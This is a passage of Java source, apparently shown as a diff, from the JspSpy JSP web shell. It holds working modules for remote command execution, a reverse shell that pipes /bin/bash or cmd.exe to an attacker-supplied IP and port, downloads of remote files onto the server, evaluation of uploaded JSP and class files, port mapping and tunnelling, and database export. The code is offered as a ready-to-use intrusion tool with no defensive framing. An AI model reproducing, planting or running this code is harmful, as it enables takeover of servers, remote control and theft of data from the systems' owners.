"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); + +File tempF = new File(savePath); +File saveF = tempF; +if (tempF.isDirectory()) { +String fName = downFileUrl.substring(downFileUrl.lastIndexOf("/")+1); +saveF = new File(tempF,fName); +} +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(saveF)); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +((Invoker)ins.get("vd")).invoke(request,response,JSession); +} catch (Exception e) { + +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +((Invoker)ins.get("filelist")).invoke(request,response,JSession); +} catch (Exception e) { + +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME); +} +} catch (Exception e) { + +throw e ; +} +} +} +private static class RemoveDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (int i = 0;i"+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +"

Pack Configuration >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Packed Dir
Save To
Ext Filter"+ +" no Blacklist Whitelist"+ +"
"+ +"
Filesize Filter(KB) "+ +" no greaterthanlessthan
Exclude Dir
"+ +" "+ +"
"+ +"
" +); +} catch (Exception e) { + +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +private boolean config = false; +private String extFilter = "blacklist"; +private String[] fileExts = null; +private String sizeFilter = "no"; +private int filesize = 0; +private String[] exclude = null; +private String packFile = null; +private void reset(){ +this.config = false; +this.extFilter = "blacklist"; +this.fileExts = null; +this.sizeFilter = "no"; +this.filesize = 0; +this.exclude = null; +this.packFile = null; +} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String config = request.getParameter("config"); +if (!Util.isEmpty(config) && config.equals("true")) { +this.config = true; +this.extFilter = request.getParameter("extfilter"); +this.fileExts = request.getParameter("fileext").split(","); +this.sizeFilter = request.getParameter("sizefilter"); +this.filesize = Integer.parseInt(request.getParameter("filesize")); +this.exclude = request.getParameter("exclude").split(","); +} +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +this.packFile = packedFile; +String saveFileName = request.getParameter("savefilename"); +File saveF = null; +if (this.config) +saveF = new File(saveFileName); +else +saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = null; +String base = ""; +if (pF.isDirectory()) { +if (pF.listFiles().length == 0) { +JSession.setAttribute(MSG,"No File To Pack ! Maybe The Directory Is Empty ."); +response.sendRedirect(SHELL_NAME); +this.reset(); +return; +} +zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +zipDir(pF,base,zout); +} else { +zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +zipFile(pF,base,zout); +} +zout.close(); +this.reset(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +if (this.config) { +String curName = f.getAbsolutePath().replace('\\','/'); +curName = curName.replaceAll("\\Q"+this.packFile+"\\E",""); +if (this.exclude != null) { +for (int i = 0;i filesize) +return; +} +} +} +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"UnPack File Success!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.forjj.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
"+ +""+ +" "+ +" "+ +" "+ +""+ +"

PortMap >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"

Local Ip :"+ +" "+ +" 		Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

"+ +" "+ +" "+ +"
"+ +"
"+ +"
"+ +"
"); +String targetIP = request.getParameter("targetIP"); +String targetPort = request.getParameter("targetPort"); +String yourIP = request.getParameter("yourIP"); +String yourPort = request.getParameter("yourPort"); +if (Util.isEmpty(targetIP)) +targetIP = "127.0.0.1"; +if (Util.isEmpty(targetPort)) +targetPort = "3389"; +if (Util.isEmpty(yourIP)) +yourIP = request.getRemoteAddr(); +if (Util.isEmpty(yourPort)) +yourPort = "53"; +out.println("
"+ +""+ +" "+ +" "+ +" "+ +""+ +"

Port Back >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"

Target Ip :"+ +" "+ +" 		Target Port :"+ +" Your Ip :"+ +" Your Port :"+ +"

"+ +" "+ +"
"+ +"
"+ +"
"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +((Invoker)ins.get("vmp")).invoke(request,response,JSession); +} catch (Exception e) { + +throw e ; +} +} +} +//PortBack +private static class PortBackInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String targetIP = request.getParameter("targetIP"); +String targetPort = request.getParameter("targetPort"); +String yourIP = request.getParameter("yourIP"); +String yourPort = request.getParameter("yourPort"); +Socket yourS = new Socket(); +yourS.connect(new InetSocketAddress(yourIP,Integer.parseInt(yourPort))); +Socket targetS = new Socket(); +targetS.connect(new InetSocketAddress(targetIP,Integer.parseInt(targetPort))); +StreamConnector.readFromLocal(new DataInputStream(targetS.getInputStream()),new DataOutputStream(yourS.getOutputStream())); +StreamConnector.readFromRemote(targetS,yourS,new DataInputStream(yourS.getInputStream()),new DataOutputStream(targetS.getOutputStream())); +JSession.setAttribute("done","Port Back Success !"); +((Invoker)ins.get("vmp")).invoke(request,response,JSession); +} catch (Exception e) { + +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); +remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +StreamConnector.readFromLocal(localIn,remoteOut); +StreamConnector.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} + +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +JSession.setAttribute(SESSION_O,"vmp"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "53"; +if (Util.isEmpty(program)) { +if (ISLINUX) +program = "/bin/bash"; +else +program = "cmd.exe"; +} + +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +""+ +"

Back Connect >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

"+ +" "+ +"
"+ +"
"+ +"
"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(process.getErrorStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +JSession.setAttribute(SESSION_O,"vbc"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

System Properties >>

"+ +"
"+ +"
"+ +"
    "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
  • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
    • "); +} +out.println("

System Environment >>

    "); +/* + Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
  • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
    • "); +}*/ +out.println("
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class ReflectInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String c = request.getParameter("Class"); +Class cls = null; +try { +if (!Util.isEmpty(c)) +cls = Class.forName(c); +} catch (ClassNotFoundException ex) { +Util.outMsg(out,"Class "+c+" Not Found ! "); +} +out.println("
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +"

Java Reflect >>

"+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Class Name : "+ +"
"+ +"
"+ +"
"); + +if (cls != null) { +StringBuffer sb = new StringBuffer(); +if (cls.getPackage() != null) +sb.append("package "+cls.getPackage().getName()+";\n"); +String n = null; +if (cls.isInterface()) +n = ""; +//else if (cls.isEnum()) +// n = "enum"; +else +n = "class"; +sb.append(Modifier.toString(cls.getModifiers())+" "+n+" "+cls.getName()+"\n"); +if (cls.getSuperclass() != null) +sb.append("\textends "+cls.getSuperclass().getName()+"\n"); +if (cls.getInterfaces() != null && cls.getInterfaces().length != 0) { +Class[] faces = cls.getInterfaces(); +sb.append("\t implements "); +for (int i = 0;i"+faces[i].getName()+""); +if (i != faces.length -1) { +sb.append(","); +} +} +} +sb.append("{\n\t\n"); +sb.append("\t//constructors..\n"); +Constructor[] cs = cls.getConstructors(); +for (int i = 0;i"); +if (obj != null) +sb.append(obj.toString()); +else +sb.append("NULL"); + +sb.append(""); +} +sb.append("\n"); +} + +sb.append("\n\t//methods\n"); +Method[] ms = cls.getDeclaredMethods(); +for (int i =0;i")+""; +Util.outMsg(out,m,"left"); +} +} catch (Exception e) { +throw e; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
JspSpy Ver: 2010 "+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+") | copy
Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Java Reflect | "+ +" "+ +" Eval Java Code | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Port Map | "+ +" Others | "+ +" JSP Env "+ +"
"); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +if (JSession.getAttribute(ENTER_MSG) != null) { +String outEntry = request.getParameter("outentry"); +if (Util.isEmpty(outEntry) || !outEntry.equals("true")) +Util.outMsg(out,JSession.getAttribute(ENTER_MSG).toString()); +} +} catch (Exception e) { + +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
"); +out.println("

Shell OnLine »


"); +out.println("
"+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input Some Commands First After You Start Or You Will Not See The Echo"+ +"
"+ +"
"+ +" "+ +"
"+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
"+ +" " +); +out.println("
"); +} catch (Exception e) { +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+System.getProperty("file.encoding")); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start(); +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { + +throw e; +} +} +} +private static class EnterInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (!Util.isEmpty(type)) { +JSession.removeAttribute(ENTER); +JSession.removeAttribute(ENTER_MSG); +JSession.removeAttribute(ENTER_CURRENT_DIR); +JSession.setAttribute(MSG,"Exit File Success ! "); +} else { +String f = request.getParameter("filepath"); +if (Util.isEmpty(f)) +return; +JSession.setAttribute(ENTER,f); +JSession.setAttribute(ENTER_MSG,"You Are In File \""+f+"\" Now ! Exit "); +} +response.sendRedirect(SHELL_NAME); +} +} +private static class VExport2FileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +String sql = request.getParameter("sql"); +String table = request.getParameter("table"); +if (Util.isEmpty(sql) && Util.isEmpty(table)) { +JSession.setAttribute(SESSION_O,"vConn"); +response.sendRedirect(SHELL_NAME); +return; +} +out.println("
"+ +""+ +" "+ +" "+ +" "+ +"
"+ +" "+ +" "+ +" "+ +" "+ +"

Export To File »

"+ +" "+ +"
Export \""+(Util.isEmpty(sql) ? table : sql.replaceAll("\"","""))+"\" To File : "+ +" "+ +"

"+BACK_HREF+"
"+ +"
"); +} +} + +private static class ExportInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +String type = request.getParameter("type"); +String filepath = request.getParameter("filepath"); +String encode = request.getParameter("encode"); +String sql = null; +DBOperator dbo = null; +dbo = (DBOperator)JSession.getAttribute(DBO); + +if (Util.isEmpty(type)) { +//table export +String tb = request.getParameter("table"); +if (Util.isEmpty(tb)) +return; +String s = dbo.getConn().getMetaData().getIdentifierQuoteString(); +sql = "select * from "+s+tb+s; + +} else if (type.equals("queryexp")) { +//query export +sql = request.getParameter("sql"); +if (Util.isEmpty(sql)) { +JSession.setAttribute(SESSION_O,"vConn"); +response.sendRedirect(SHELL_NAME); +return; +} +} +Object o = dbo.execute(sql); +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +byte[] rowSep = "\r\n".getBytes(); +if (o instanceof ResultSet) { +ResultSet rs = (ResultSet)o; +ResultSetMetaData meta = rs.getMetaData(); +int count = meta.getColumnCount(); +for (int i =1;i<=count;i++) { +String colName = meta.getColumnName(i)+"\t"; +byte[] b = null; +if (Util.isEmpty(encode)) +b = colName.getBytes(); +else +b = colName.getBytes(encode); +bout.write(b,0,b.length); +} +bout.write(rowSep,0,rowSep.length); +while (rs.next()) { +for (int i =1;i<=count;i++) { +String v = null; +try { +v = rs.getString(i); +} catch (SQLException ex) { +v = "<>"; +} +v += "\t"; +byte[] b = null; +if (Util.isEmpty(encode)) +b = v.getBytes(); +else +b = v.getBytes(encode); +bout.write(b,0,b.length); +} +bout.write(rowSep,0,rowSep.length); +} +rs.close(); +ByteArrayInputStream input = new ByteArrayInputStream(bout.toByteArray()); +BufferedOutputStream output = null; +if (!Util.isEmpty(filepath)) { +//export2file +output = new BufferedOutputStream(new FileOutputStream(new File(filepath))); +} else { +//download. +response.setHeader("Content-Disposition","attachment;filename=DataExport.txt"); +output = new BufferedOutputStream(response.getOutputStream()); +} +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +bout.close(); +input.close(); +output.close(); +if (!Util.isEmpty(filepath)) { +JSession.setAttribute(MSG,"Export To File Success !"); +response.sendRedirect(SHELL_NAME); +} +} +} +} +private static class EvalInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +String type = request.getParameter("type"); +PrintWriter out = response.getWriter(); +Object msg = JSession.getAttribute(MSG); +if (msg != null) { +Util.outMsg(out,(String)msg); +JSession.removeAttribute(MSG); +} +if (Util.isEmpty(type)) { +out.println(""+ +" "+ +" "+ +" "+ +"

Eval Java Code »

"+ +"
"+ +"

"+ +"

"+ +"UpLoad a Class File : "); +Util.outMsg(out,"
"+
+"public class SpyEval{\r\n"+
+"	static {\r\n"+
+"		//Your Code Here.\r\n"+
+"	}\r\n"+
+"}\r\n"+
+"
","left"); +out.println("
"+ +"

Jsp Eval :
"+ +" "+ +" "+ +"
"+ +"
"+ +"

"+ +"
"); +} else if (type.equals("jsp")){ +String jspc = request.getParameter("jspc"); +if (Util.isEmpty(jspc)) +return; +File f = new File(SHELL_DIR,"evaltmpninty.jsp"); +BufferedWriter writer = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f),"utf-8")); +writer.write(jspc,0,jspc.length()); +writer.flush(); +writer.close(); +out.println(""+ +" "+ +"

Jsp Eval Result »

"); +out.println("
"); +request.getRequestDispatcher("evaltmpninty.jsp").include(request,response); +out.println("
"); +f.delete(); +} +} +} +private static class EvalUploadInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +ByteArrayOutputStream stream = new ByteArrayOutputStream(); +UploadBean upload = new UploadBean(); +upload.setTargetOutput(stream); +upload.parseRequest(request); + +if (stream.toByteArray().length == 2) { +JSession.setAttribute(MSG,"Please Upload Your Class File ! "); +((Invoker)ins.get("ev")).invoke(request,response,JSession); +return; +} +SpyClassLoader loader = new SpyClassLoader(); +try { +Class c = loader.defineClass(null,stream.toByteArray()); +c.newInstance(); +}catch(Exception e) { +} +stream.close(); +JSession.setAttribute(MSG,"Eval Java Class Done ! "); +((Invoker)ins.get("ev")).invoke(request,response,JSession); +} +} +private static class VOtherInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object msg = JSession.getAttribute(MSG); +if (msg != null) { +Util.outMsg(out,(String)msg); +JSession.removeAttribute(MSG); +} +out.println(""+ +" "+ +" "+ +" "+ +"

Session Manager>>

"+ +"
"+ +"
    "); +Enumeration en = JSession.getAttributeNames(); +while (en.hasMoreElements()) { +Object o = en.nextElement(); +if (o.toString().equals(MSG)) +continue; +out.println("
  • "+o.toString()+" "); +out.println(" "); +out.println(""); +out.println(""); +out.println("
    • "); +} +out.println("
  • "+ +"New Session Attribute"+ +"name : value : "+ +"
"); +} catch (Exception e) { +throw e ; +} +} +} +//Session Manager +private static class SmInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +PrintWriter out = response.getWriter(); +if (type.equals("update")) { +String name = request.getParameter("name"); +String value = request.getParameter("value"); +JSession.setAttribute(name,value); +JSession.setAttribute(MSG,"Update/Add Attribute Success !"); +} else if (type.equals("delete")) { +String name = request.getParameter("name"); +JSession.removeAttribute(name); +JSession.setAttribute(MSG,"Remove Attribute Success !"); +} +((Invoker)ins.get("vother")).invoke(request,response,JSession); +} catch (Exception e) { + +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoveDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +ins.put("enter",new EnterInvoker()); +ins.put("export",new ExportInvoker()); +ins.put("ev",new 